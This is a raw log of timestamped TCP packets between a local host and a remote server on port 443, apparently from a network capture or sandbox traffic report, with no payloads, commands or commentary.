Apr 24, 2024 10:24:13.736649036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.736658096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.736668110 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.739662886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.739687920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.739720106 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.739727974 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.739751101 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.741199017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.741220951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.741257906 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.741266012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.741275072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.746792078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.746817112 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.746850967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.746860027 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.746881008 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.747817039 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.747838020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.747876883 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.747884035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.747894049 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.748527050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.748553038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.748579025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.748585939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.748596907 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.749130964 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749152899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749182940 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.749190092 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749207020 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.749617100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749644041 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749665976 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.749671936 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.749686003 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.749710083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.752520084 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.752545118 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.752579927 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.752585888 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.752597094 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.753248930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753273964 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753302097 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.753309011 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753319025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.753817081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753839970 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753861904 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.753869057 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.753892899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.753892899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.754518986 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.754544020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.754564047 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.754571915 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.754582882 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.754604101 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.755247116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.755268097 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.755295992 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.755301952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.755311966 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.755331993 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.755918980 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.755944014 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.755963087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.755974054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.756002903 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.757500887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.757522106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.757543087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.757550001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.757561922 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.757587910 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758146048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758171082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758198023 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758203983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758217096 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758243084 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758861065 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758883953 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758908033 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758914948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.758925915 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.758940935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.759571075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.759598017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.759614944 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.759619951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.759637117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.759660006 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760174990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760200024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760219097 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760225058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760238886 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760262012 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760893106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760917902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760942936 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760950089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.760960102 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.760982990 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.762497902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.762522936 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.762547016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.762567043 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.762579918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.762588978 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.765023947 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.765045881 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.765074015 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.765098095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.765113115 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.765113115 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.767570019 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.767596006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.767621040 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.767637968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.767648935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.767657042 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.849513054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.849536896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.849663019 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.849683046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867094994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867136955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867149115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867175102 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867181063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.867188931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.867199898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.867217064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.870008945 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.870029926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.870059967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.870059967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.870075941 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.870084047 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.870110989 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.872876883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.872898102 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.872921944 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.872930050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.872939110 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.876853943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.876904011 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.906430006 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.906441927 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.906460047 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.906496048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.906508923 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.906524897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.906533957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.906548023 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.906613111 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907147884 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907154083 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.907201052 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907270908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907273054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.907286882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.907337904 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907341003 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.907367945 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.907912016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.908008099 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.915323973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.915348053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.915402889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.915411949 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.915421963 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.917654037 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.917679071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.917717934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.917737961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.917748928 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.919929028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.919949055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.919985056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.920007944 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.920018911 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.923157930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.923181057 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.923216105 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.923238993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.923254013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.923264027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.925159931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.925179005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.925220013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.925249100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.925267935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.925468922 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.927383900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.927407026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.927447081 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.927474976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.927486897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.927757978 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.928113937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.928133965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.928158045 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.928169966 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.928184986 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.928271055 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.929272890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.929297924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.929325104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.929337025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.929351091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.929372072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.930672884 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.930694103 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.930725098 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.930735111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.930747986 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.930783987 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.931624889 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.931649923 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.931668043 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.931677103 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.931693077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.933568954 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.933588982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.933624029 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.933640003 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.933651924 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.936216116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.936242104 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.936275959 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.936291933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.936301947 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.936444998 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.938735962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.938755989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.938800097 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.938815117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.938824892 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.940517902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.940541983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.940572977 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.940593004 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.940608025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.943695068 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.943716049 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.943767071 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.943790913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.943805933 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.943989992 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.944967985 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.944992065 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.945014000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.945027113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.945039034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.945096016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.947684050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.947704077 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.947758913 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.947777987 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.947788954 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.947803020 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.949923992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.949948072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.949974060 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.949987888 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.950004101 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.952007055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.952028990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.952058077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.952070951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.952085018 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.954255104 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.954284906 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.954313993 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.954325914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.954338074 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.958720922 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.958767891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.958785057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.958796978 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.958853960 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.959167004 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.959192038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.959218025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.959227085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.959238052 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.961029053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.961065054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.961081982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.961087942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.961101055 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.963020086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.963047028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.963069916 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.963076115 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.963092089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.965548038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.965581894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.965604067 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.965621948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.965635061 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.967995882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.968030930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.968056917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.968080997 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.968095064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.969990015 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.970024109 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.970065117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.970065117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.970082998 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.972992897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.973022938 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.973062038 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.973073006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.973083019 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.974483967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.974518061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.974554062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.974560022 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.974574089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.977035046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.977063894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.977107048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.977113962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.977123022 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.978827000 CEST	443	49164	172.67.215.45	192.168.2.22
